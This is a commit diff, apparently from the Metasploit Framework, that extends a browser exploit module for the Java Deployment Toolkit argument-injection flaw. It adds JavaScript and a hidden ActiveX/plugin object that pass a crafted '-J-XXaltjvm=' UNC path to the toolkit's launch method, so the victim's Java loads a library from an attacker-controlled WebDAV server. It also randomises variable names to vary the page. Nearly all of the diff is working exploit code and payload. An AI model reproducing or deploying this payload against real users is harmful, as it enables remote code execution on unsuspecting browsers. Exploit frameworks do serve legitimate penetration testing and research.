added support for older JREs using javascript methods from taviso's exploit
git-svn-id: file:///home/svn/framework3/trunk@9151 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
08117ca000
commit
ac188bebdb
|
@ -31,11 +31,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
an unsuspecting browser user.
|
||||
|
||||
This vulnerability was originally discovered independently by both Ruben
|
||||
Santamarta and Tavis Ormandy. Tavis reported that all versions since version
|
||||
Santamarta and Tavis Ormandy. Tavis reported that all versions since version
|
||||
6 Update 10 "are believed to be affected by this vulnerability."
|
||||
|
||||
|
||||
In order for this module to work, it must be ran as root on a server that
|
||||
does not serve SMB. Additionally, the target host must have the WebClient
|
||||
does not serve SMB. Additionally, the target host must have the WebClient
|
||||
service (WebDAV Mini-Redirector) enabled.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 09 2010'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
|
||||
|
@ -196,10 +196,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jnlp = "-J-XXaltjvm=" + unc + " " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"
|
||||
docbase = ""
|
||||
|
||||
# for the javascript version
|
||||
var_obj = rand_text_alpha(8+rand(8))
|
||||
var_str = rand_text_alpha(8+rand(8))
|
||||
var_obj2 = rand_text_alpha(8+rand(8))
|
||||
var_obj3 = rand_text_alpha(8+rand(8))
|
||||
js_jnlp = "http: "
|
||||
js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez
|
||||
|
||||
# The 8ad.. CLSID doesn't support the launch method ...
|
||||
#clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
|
||||
clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
|
||||
html = %Q|<html>
|
||||
<body>
|
||||
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"
|
||||
width="100%" height="100%">
|
||||
<object id="#{var_obj}" classid="clsid:#{clsid}"
|
||||
width="0" height="0">
|
||||
<PARAM name="launchjnlp" value="#{jnlp}">
|
||||
<PARAM name="docbase" value="#{docbase}">
|
||||
</object>
|
||||
|
@ -208,6 +219,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
launchjnlp="#{jnlp}"
|
||||
docbase="#{docbase}"
|
||||
/>
|
||||
<script language="javascript">
|
||||
var #{var_str} = "#{js_jnlp}";
|
||||
if (window.navigator.appName == "Microsoft Internet Explorer") {
|
||||
#{var_obj}.launch(#{var_str});
|
||||
} else {
|
||||
try {
|
||||
var #{var_obj2} = document.createElement("OBJECT");
|
||||
#{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
|
||||
document.body.appendChild(#{var_obj2});
|
||||
#{var_obj2}.launch(#{var_str});
|
||||
} catch (e) {
|
||||
var #{var_obj3} = document.createElement("OBJECT");
|
||||
#{var_obj3}.type = "application/java-deployment-toolkit";
|
||||
document.body.appendChild(#{var_obj3});
|
||||
#{var_obj3}.launch(#{var_str});
|
||||
}
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
@ -267,13 +296,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</D:response>
|
||||
</D:multistatus>
|
||||
|
|
||||
=begin
|
||||
# We don't have these things
|
||||
elsif (path =~ /\.manifest$/i) or (path =~ /\.config$/i) or (path =~ /\.exe/i)
|
||||
print_status("Sending 404 for #{path} ...")
|
||||
send_not_found(cli)
|
||||
return
|
||||
=end
|
||||
|
||||
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
|
||||
# Response for anything else (generally just /)
|
||||
print_status("Sending directory multistatus for #{path} ...")
|
||||
|
|
Loading…
Reference in New Issue